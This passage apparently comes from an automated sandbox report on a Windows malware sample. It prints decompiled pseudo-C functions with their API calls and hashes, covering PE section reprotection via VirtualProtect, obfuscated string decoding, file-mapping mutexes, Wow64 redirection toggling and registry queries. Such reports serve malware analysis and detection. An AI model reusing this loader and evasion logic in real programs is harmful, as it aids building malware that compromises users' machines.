                        				if(_v8 >= _t39) {
                        					_t28 = _v12;
                        					if(_t28 != 0) {
                        						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                        						_v8 = _t31;
                        						if(_t31 >= 0) {
                        							_t46 = lstrlenW(_v16);
                        							if(_t46 != 0) {
                        								_t46 = _t46 + 1;
                        								_t48 = _t46 + _t46;
                        								_t39 = E00505C4E(_t48);
                        								if(_t39 == 0) {
                        									_v8 = 0x8007000e;
                        								} else {
                        									memcpy(_t39, _v16, _t48);
                        								}
                        								__imp__#6(_v16);
                        							}
                        						}
                        						_t32 = _v12;
                        						 *((intOrPtr*)( *_t32 + 8))(_t32);
                        					}
                        					 *_a4 = _t39;
                        					 *_a8 = _t46 + _t46;
                        				}
                        				goto L13;
                        			}

                        APIs
                        • Sleep.KERNEL32(000000C8), ref: 005059B6
                        • lstrlenW.KERNEL32(?), ref: 005059EC
                        • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00505A0D
                        • SysFreeString.OLEAUT32(?), ref: 00505A21
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeSleepStringlstrlenmemcpy
                        • String ID:
                        • API String ID: 1198164300-0
                        • Opcode ID: c6b7e4b2f74d645869c2144c2eba64597b9529b7cfeb43f6cf6d79d1b18f0a7e
                        • Instruction ID: 667b6fc46415f82530db9fd7f574653adab5cf33bfbe0f98ad03aeaacfab5979
                        • Opcode Fuzzy Hash: c6b7e4b2f74d645869c2144c2eba64597b9529b7cfeb43f6cf6d79d1b18f0a7e
                        • Instruction Fuzzy Hash: 75213D75A0060AEFCB11DFA8C88899EBFB8FF48345F1442A9E945E7254F7309A45DF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E6C501D32(void* __ecx, intOrPtr _a4) {
                        				long _t3;
                        				int _t4;
                        				int _t9;
                        				void* _t13;
                        
                        				_t13 = GetCurrentThread();
                        				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                        				if(_t3 != 0) {
                        					SetThreadPriority(_t13, 0xffffffff); // executed
                        				}
                        				_t4 = E6C5017A7(_a4); // executed
                        				_t9 = _t4;
                        				if(_t9 == 0) {
                        					SetThreadPriority(_t13, _t4);
                        				}
                        				asm("lock xadd [eax], ecx");
                        				return _t9;
                        			}

                        APIs
                        • GetCurrentThread.KERNEL32 ref: 6C501D35
                        • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6C501D40
                        • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6C501D53
                        • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6C501D66
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: Thread$Priority$AffinityCurrentMask
                        • String ID:
                        • API String ID: 1452675757-0
                        • Opcode ID: 2055e3f5b47fd1f18b8167ba0cc5944b6f8d8e7131ebaa5fe3c8a0939a13e2b4
                        • Instruction ID: 6bcb24f426fea93d02a52b15d183422dd7807eab43a50587a9c863a1ccf1d497
                        • Opcode Fuzzy Hash: 2055e3f5b47fd1f18b8167ba0cc5944b6f8d8e7131ebaa5fe3c8a0939a13e2b4
                        • Instruction Fuzzy Hash: 7AE092313067106BD7022A294C88EAB7BACDFD333A7120339F524D32D0DB54CC09D6AA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E00507471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                        				void* _v8;
                        				void* __esi;
                        				intOrPtr* _t35;
                        				void* _t40;
                        				intOrPtr* _t41;
                        				intOrPtr* _t43;
                        				intOrPtr* _t45;
                        				intOrPtr* _t50;
                        				intOrPtr* _t52;
                        				void* _t54;
                        				intOrPtr* _t55;
                        				intOrPtr* _t57;
                        				intOrPtr* _t61;
                        				intOrPtr* _t65;
                        				intOrPtr _t68;
                        				void* _t72;
                        				void* _t75;
                        				void* _t76;
                        
                        				_t55 = _a4;
                        				_t35 =  *((intOrPtr*)(_t55 + 4));
                        				_a4 = 0;
                        				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                        				if(_t76 < 0) {
                        					L18:
                        					return _t76;
                        				}
                        				_t40 = E0050344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                        				_t76 = _t40;
                        				if(_t76 >= 0) {
                        					_t61 = _a28;
                        					if(_t61 != 0 &&  *_t61 != 0) {
                        						_t52 = _v8;
                        						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                        					}
                        					if(_t76 >= 0) {
                        						_t43 =  *_t55;
                        						_t68 =  *0x50a2d0; // 0x2add5a8
                        						_t20 = _t68 + 0x50b1fc; // 0x740053
                        						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                        						if(_t76 >= 0) {
                        							_t76 = E00502986(_a4);
                        							if(_t76 >= 0) {
                        								_t65 = _a28;
                        								if(_t65 != 0 &&  *_t65 == 0) {
                        									_t50 = _a4;
                        									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                        								}
                        							}
                        						}
                        						_t45 = _a4;
                        						if(_t45 != 0) {
                        							 *((intOrPtr*)( *_t45 + 8))(_t45);
                        						}
                        						_t57 = __imp__#6;
                        						if(_a20 != 0) {
                        							 *_t57(_a20);
                        						}
                        						if(_a12 != 0) {
                        							 *_t57(_a12);
                        						}
                        					}
                        				}
                        				_t41 = _v8;
                        				 *((intOrPtr*)( *_t41 + 8))(_t41);
                        				goto L18;
                        			}

                        APIs
                          • Part of subcall function 0050344C: SysAllocString.OLEAUT32(80000002), ref: 005034A3
                          • Part of subcall function 0050344C: SysFreeString.OLEAUT32(00000000), ref: 00503508
                        • SysFreeString.OLEAUT32(?), ref: 00507550
                        • SysFreeString.OLEAUT32(005020DE), ref: 0050755A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$Free$Alloc
                        • String ID: -tP
                        • API String ID: 986138563-4025278887
                        • Opcode ID: 90922bdd2fcbb02d14b00fa339e4135b85255c7f0862de3209b21a0468aed820
                        • Instruction ID: ca8747ee6daebaa3d77e87877742869b64f524e0810d00e8da5f7569c062c803
                        • Opcode Fuzzy Hash: 90922bdd2fcbb02d14b00fa339e4135b85255c7f0862de3209b21a0468aed820
                        • Instruction Fuzzy Hash: CA31167290011AAFCB21DF69DC88C9FBB79FBC9740B144658F9159B260E632ED51CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00504A3C(void* __edx) {
                        				void* _v8;
                        				int _v12;
                        				WCHAR* _v16;
                        				void* __esi;
                        				void* _t23;
                        				intOrPtr _t24;
                        				void* _t26;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t38;
                        				intOrPtr _t42;
                        				void* _t45;
                        				void* _t50;
                        				void* _t55;
                        
                        				_t50 = __edx;
                        				_v12 = 0;
                        				_t23 = E00504380(0,  &_v8); // executed
                        				if(_t23 != 0) {
                        					_v8 = 0;
                        				}
                        				_t24 =  *0x50a2d0; // 0x2add5a8
                        				_t4 = _t24 + 0x50bd90; // 0x2fe9338
                        				_t5 = _t24 + 0x50bd38; // 0x4f0053
                        				_t26 = E005030AD( &_v16, _v8, _t5, _t4); // executed
                        				_t45 = _t26;
                        				if(_t45 == 0) {
                        					StrToIntExW(_v16, 0,  &_v12);
                        					_t45 = 8;
                        					if(_v12 < _t45) {
                        						_t45 = 1;
                        						__eflags = 1;
                        					} else {
                        						_t32 =  *0x50a2d0; // 0x2add5a8
                        						_t11 = _t32 + 0x50bd84; // 0x2fe932c
                        						_t48 = _t11;
                        						_t12 = _t32 + 0x50bd38; // 0x4f0053
                        						_t55 = E00504DC8(_t11, _t12, _t11);
                        						_t59 = _t55;
                        						if(_t55 != 0) {
                        							_t35 =  *0x50a2d0; // 0x2add5a8
                        							_t13 = _t35 + 0x50bdce; // 0x30314549
                        							if(E00505EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                        								_t61 =  *0x50a2b4 - 6;
                        								if( *0x50a2b4 <= 6) {
                        									_t42 =  *0x50a2d0; // 0x2add5a8
                        									_t15 = _t42 + 0x50bbda; // 0x52384549
                        									E00505EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                        								}
                        							}
                        							_t38 =  *0x50a2d0; // 0x2add5a8
                        							_t17 = _t38 + 0x50bdc8; // 0x2fe9370
                        							_t18 = _t38 + 0x50bda0; // 0x680043
                        							_t45 = E005033B7(_v8, 0x80000001, _t55, _t18, _t17);
                        							HeapFree( *0x50a290, 0, _t55);
                        						}
                        					}
                        					HeapFree( *0x50a290, 0, _v16);
                        				}
                        				_t54 = _v8;
                        				if(_v8 != 0) {
                        					E00503EFA(_t54);
                        				}
                        				return _t45;
                        			}

                        APIs
                        • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FE9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00504A8B
                        • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FE9370,?,00000000,30314549,00000014,004F0053,02FE932C), ref: 00504B28
                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00501BD5), ref: 00504B3A
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 5a5794c87c225c29bb49db328f176b2462c9b240bbd7e11f3c4c226975ca5e78
                        • Instruction ID: 228924f8010da0102986307f5f6b555edf242a5eee37e0a5157f25e58c65cb50
                        • Opcode Fuzzy Hash: 5a5794c87c225c29bb49db328f176b2462c9b240bbd7e11f3c4c226975ca5e78
                        • Instruction Fuzzy Hash: 30316F7650020AAFDB11AB95DDC5EAEBFBCFF54700F1500A5F605A70A2D7719A08EB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0050243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                        				void* _v8;
                        				char _v48;
                        				void* __edi;
                        				intOrPtr _t22;
                        				long _t29;
                        				intOrPtr _t33;
                        				intOrPtr* _t41;
                        				void* _t42;
                        				void* _t46;
                        				intOrPtr* _t47;
                        				void* _t48;
                        				intOrPtr _t50;
                        
                        				_t42 = __ecx;
                        				_t41 = _a16;
                        				_t47 = __eax;
                        				_t22 =  *0x50a2d0; // 0x2add5a8
                        				_t2 = _t22 + 0x50b671; // 0x657a6973
                        				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                        				if( *0x50a2a4 >= 5) {
                        					_push( &_a16);
                        					_push( &_v8);
                        					_push( &_v48);
                        					_t29 = _a4;
                        					"QQSUVWh"();
                        					L5:
                        					_a4 = _t29;
                        					L6:
                        					if(_a4 != 0) {
                        						L9:
                        						 *0x50a2a4 =  *0x50a2a4 + 1;
                        						L10:
                        						return _a4;
                        					}
                        					_t49 = _a16;
                        					 *_t47 = _a16;
                        					_t48 = _v8;
                        					 *_t41 = E00503F12(_t49, _t48); // executed
                        					_t33 = E005045E6(_t46, _t48, _t49); // executed
                        					if(_t33 != 0) {
                        						 *_a8 = _t48;
                        						 *_a12 = _t33;
                        						if( *0x50a2a4 < 5) {
                        							 *0x50a2a4 =  *0x50a2a4 & 0x00000000;
                        						}
                        						goto L10;
                        					}
                        					_a4 = 0xbf;
                        					E00502813();
                        					RtlFreeHeap( *0x50a290, 0, _t48); // executed
                        					goto L9;
                        				}
                        				_t50 =  *0x50a390; // 0x2fe8d6c
                        				if(RtlAllocateHeap( *0x50a290, 0, 0x800) == 0) {
                        					_a4 = 8;
                        					goto L6;
                        				}
                        				_t29 = E00506DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
                        				goto L5;
                        			}

                        APIs
                        • wsprintfA.USER32 ref: 0050245E
                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00502483
                          • Part of subcall function 00506DB7: GetTickCount.KERNEL32 ref: 00506DCE
                          • Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E1B
                          • Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E38
                          • Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E58
                          • Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E76
                          • Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506E99
                          • Part of subcall function 00506DB7: wsprintfA.USER32 ref: 00506EBA
                        • RtlFreeHeap.NTDLL(00000000,00501C1F,?,?,00501C1F,?), ref: 005024FD
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: wsprintf$Heap$AllocateCountFreeTick
                        • String ID:
                        • API String ID: 2794511967-0
                        • Opcode ID: 48fc774df186d800ec70ec11265089be0b8601961782067bbb926bdf0f6aaa72
                        • Instruction ID: 88f621ba094d98ae8073c8802d1213b43af1d20ea2423a5b30890ea29c56a970
                        • Opcode Fuzzy Hash: 48fc774df186d800ec70ec11265089be0b8601961782067bbb926bdf0f6aaa72
                        • Instruction Fuzzy Hash: 0B31297650020AEFCB11DF64DD88A9E3BBCFB58310F108022F905AB291D775A958DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E6C501030(void* __eax, void* _a4) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				long _v20;
                        				int _t43;
                        				long _t54;
                        				signed int _t57;
                        				void* _t58;
                        				signed int _t60;
                        
                        				_v12 = _v12 & 0x00000000;
                        				_t57 =  *0x6c5041cc;
                        				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                        				_v16 =  *(__eax + 6) & 0x0000ffff;
                        				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                        				_v8 = _v8 & 0x00000000;
                        				if(_v16 <= 0) {
                        					L12:
                        					return _v12;
                        				} else {
                        					goto L1;
                        				}
                        				while(1) {
                        					L1:
                        					_t60 = _v12;
                        					if(_t60 != 0) {
                        						goto L12;
                        					}
                        					asm("bt [esi+0x24], eax");
                        					if(_t60 >= 0) {
                        						asm("bt [esi+0x24], eax");
                        						if(__eflags >= 0) {
                        							L8:
                        							_t54 = _t57 - 0x63699bbf;
                        							L9:
                        							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                        							if(_t43 == 0) {
                        								_v12 = GetLastError();
                        							}
                        							_v8 = _v8 + 1;
                        							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                        							if(_v8 < _v16) {
                        								continue;
                        							} else {
                        								goto L12;
                        							}
                        						}
                        						asm("bt [esi+0x24], eax");
                        						_t54 = _t57 - 0x63699bc1;
                        						if(__eflags >= 0) {
                        							goto L9;
                        						}
                        						goto L8;
                        					}
                        					asm("bt [esi+0x24], eax");
                        					if(_t60 >= 0) {
                        						_t54 = _t57 - 0x63699ba3;
                        					} else {
                        						_t54 = _t57 - 0x63699b83;
                        					}
                        					goto L9;
                        				}
                        				goto L12;
                        			}

                        APIs
                        • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6C501069
                        • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6C5010DE
                        • GetLastError.KERNEL32 ref: 6C5010E4
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: ProtectVirtual$ErrorLast
                        • String ID:
                        • API String ID: 1469625949-0
                        • Opcode ID: 7c7d2f11b781c2d4b79b3e056cf86dd16b38a150f007855d8da78876714f877a
                        • Instruction ID: 63517943b2a6a055e43284a733b7e6f3ee73b2765dc0dc15e653186aac8c810e
                        • Opcode Fuzzy Hash: 7c7d2f11b781c2d4b79b3e056cf86dd16b38a150f007855d8da78876714f877a
                        • Instruction Fuzzy Hash: 9F214D31A01206DFCB14CF95C895AABF7F5FB0431DF008959D046D7841E3B8E699DB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E6C5016EC() {
                        				char _v28;
                        				void _v44;
                        				char _v48;
                        				void* _v52;
                        				long _t23;
                        				int _t24;
                        				void* _t28;
                        				intOrPtr* _t30;
                        				signed int _t34;
                        				intOrPtr _t36;
                        
                        				_push(0);
                        				_push(0x6c5041c4);
                        				_push(1);
                        				_push( *0x6c5041d0 + 0x6c505089);
                        				 *0x6c5041c0 = 0xc;
                        				 *0x6c5041c8 = 0; // executed
                        				L6C5014D8(); // executed
                        				_t34 = 6;
                        				memset( &_v44, 0, _t34 << 2);
                        				if(E6C501112( &_v44,  &_v28,  *0x6c5041cc ^ 0xfd7cd1cf) == 0) {
                        					_t23 = 0xb;
                        					L7:
                        					ExitThread(_t23);
                        				}
                        				_t24 = lstrlenW( *0x6c5041b8);
                        				_t7 = _t24 + 2; // 0x2
                        				_t10 = _t24 + _t7 + 8; // 0xa
                        				_t28 = E6C501979(_t36, _t10,  &_v48,  &_v52); // executed
                        				if(_t28 == 0) {
                        					_t30 = _v52;
                        					 *_t30 = 0;
                        					if( *0x6c5041b8 == 0) {
                        						 *((short*)(_t30 + 4)) = 0;
                        					} else {
                        						E6C502112(_t40, _t30 + 4);
                        					}
                        				}
                        				_t23 = E6C501236(_v44); // executed
                        				goto L7;
                        			}

                        APIs
                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6C5041C4,00000000), ref: 6C50171D
                        • lstrlenW.KERNEL32(?,?,?), ref: 6C501751
                          • Part of subcall function 6C501979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?,?), ref: 6C501986
                          • Part of subcall function 6C501979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6C50199C
                          • Part of subcall function 6C501979: _snwprintf.NTDLL ref: 6C5019C1
                          • Part of subcall function 6C501979: CreateFileMappingW.KERNELBASE(000000FF,6C5041C0,00000004,00000000,?,?), ref: 6C5019E6
                          • Part of subcall function 6C501979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C5019FD
                          • Part of subcall function 6C501979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A), ref: 6C501A32
                        • ExitThread.KERNEL32 ref: 6C5017A0
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                        • String ID:
                        • API String ID: 4209869662-0
                        • Opcode ID: 01adb9189f6c7782826e532d040a3409e86359911affecef2cf4dd03da1dec9f
                        • Instruction ID: 8d24e4fe4f51ca322612cec04bc975ecc86be992eb016b221d544de905c470a0
                        • Opcode Fuzzy Hash: 01adb9189f6c7782826e532d040a3409e86359911affecef2cf4dd03da1dec9f
                        • Instruction Fuzzy Hash: CF119D72304202AFDB11DB65CC44E9B7BFCFB95718F02091AF505D7551D730E9088B96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 28%
                        			E0050274E(void* __ecx, signed char* _a4) {
                        				signed int _v8;
                        				void* _v12;
                        				void* _t13;
                        				signed short _t16;
                        				signed int _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t22;
                        				void* _t23;
                        				signed short* _t26;
                        				void* _t27;
                        				intOrPtr* _t28;
                        				void* _t30;
                        				intOrPtr* _t31;
                        
                        				_t31 = __imp__;
                        				_t23 = 0;
                        				_v8 = 1;
                        				_t28 = 0x50a380;
                        				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                        				while(1) {
                        					_t13 = E00504E9C(_a4,  &_v12); // executed
                        					if(_t13 == 0) {
                        						break;
                        					}
                        					_push(_v12);
                        					_t19 = 0xd;
                        					_t20 = E005033FA(_t19);
                        					if(_t20 == 0) {
                        						HeapFree( *0x50a290, 0, _v12);
                        						break;
                        					} else {
                        						 *_t28 = _t20;
                        						_t28 = _t28 + 4;
                        						_t23 = _t23 + 1;
                        						if(_t23 < 3) {
                        							continue;
                        						} else {
                        						}
                        					}
                        					L7:
                        					 *_t31(1);
                        					if(_v8 != 0) {
                        						_t26 =  *0x50a388; // 0x2fe9c78
                        						_t16 =  *_t26 & 0x0000ffff;
                        						if(_t16 < 0x61 || _t16 > 0x7a) {
                        							_t17 = _t16 & 0x0000ffff;
                        						} else {
                        							_t17 = (_t16 & 0x0000ffff) - 0x20;
                        						}
                        						 *_t26 = _t17;
                        					}
                        					return _v8;
                        				}
                        				_v8 = _v8 & 0x00000000;
                        				goto L7;
                        			}

                        APIs
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0050276B
                          • Part of subcall function 00504E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,0050A380), ref: 00504EC7
                          • Part of subcall function 00504E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00504EE9
                          • Part of subcall function 00504E9C: memset.NTDLL ref: 00504F03
                          • Part of subcall function 00504E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00504F41
                          • Part of subcall function 00504E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00504F55
                          • Part of subcall function 00504E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 00504F6C
                          • Part of subcall function 00504E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00504F78
                          • Part of subcall function 00504E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00504FB9
                          • Part of subcall function 00504E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00504FCF
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 005027B0
                          • Part of subcall function 005033FA: lstrlen.KERNEL32(?,0050A380,73BB7FC0,00000000,00502788,?,?,?,?,?,00503EAC,?), ref: 00503403
                          • Part of subcall function 005033FA: mbstowcs.NTDLL ref: 0050342A
                          • Part of subcall function 005033FA: memset.NTDLL ref: 0050343C
                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00503EAC,?), ref: 005027A4
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
                        • String ID:
                        • API String ID: 1489712272-0
                        • Opcode ID: 23abe13b40c81f67718427d272ca54d1877c4bb5655a0631b86722b0f44d319a
                        • Instruction ID: 811bf52c931cd29548cbf7f17d84208d99e1fd9815d94034524dd61d77c8c0f6
                        • Opcode Fuzzy Hash: 23abe13b40c81f67718427d272ca54d1877c4bb5655a0631b86722b0f44d319a
                        • Instruction Fuzzy Hash: 9111007A600308EFEB009BA5CC88BEC7FB8FB44324F600026E501D60D0D3B5AE81EB21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0050779E(void* __ecx, void* __eflags) {
                        				char _v8;
                        				void* _v12;
                        				int _v16;
                        				int _v20;
                        				intOrPtr _t15;
                        				intOrPtr _t19;
                        				long _t24;
                        				long _t29;
                        				short* _t31;
                        				short* _t34;
                        
                        				_t15 =  *0x50a2d0; // 0x2add5a8
                        				_v8 = _v8 & 0x00000000;
                        				_t3 = _t15 + 0x50ba60; // 0x4f0053
                        				_v16 = 4;
                        				_t31 = E00504C7C(__ecx, _t3);
                        				if(_t31 != 0) {
                        					_t19 =  *0x50a2d0; // 0x2add5a8
                        					_t5 = _t19 + 0x50babc; // 0x6e0049
                        					_t34 = E00504C7C(__ecx, _t5);
                        					if(_t34 != 0) {
                        						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                        						if(_t24 == 0) {
                        							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                        							if(_t29 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        							}
                        							RegCloseKey(_v12);
                        						}
                        						E00502A03(_t34);
                        					}
                        					E00502A03(_t31);
                        				}
                        				return _v8;
                        			}

                        APIs
                          • Part of subcall function 00504C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,005077C1,004F0053,00000000,?), ref: 00504C85
                          • Part of subcall function 00504C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,005077C1,004F0053,00000000,?), ref: 00504CAF
                          • Part of subcall function 00504C7C: memset.NTDLL ref: 00504CC3
                        • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 005077F0
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0050780C
                        • RegCloseKey.ADVAPI32(00000000), ref: 0050781D
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                        • String ID:
                        • API String ID: 830012212-0
                        • Opcode ID: 6168a9b2ac3bf9e4f05ad8895c4310c46b550cd0ed30df5c8b2553f15b87084d
                        • Instruction ID: 621d723fcdbc0bc68276cbb31e9d965565699f8ff5a84efe9dd891197b273972
                        • Opcode Fuzzy Hash: 6168a9b2ac3bf9e4f05ad8895c4310c46b550cd0ed30df5c8b2553f15b87084d
                        • Instruction Fuzzy Hash: AB111276A0020EBBEB11DBD5DC8DFAE7BBCBF44701F144055B601E6091D774AA049B51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00501896(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				int _v12;
                        				signed int _v16;
                        				void* _v20;
                        				signed char _v36;
                        				void* __ebx;
                        				void* _t24;
                        				intOrPtr _t27;
                        				void* _t35;
                        				signed char* _t46;
                        				void* _t52;
                        				int _t54;
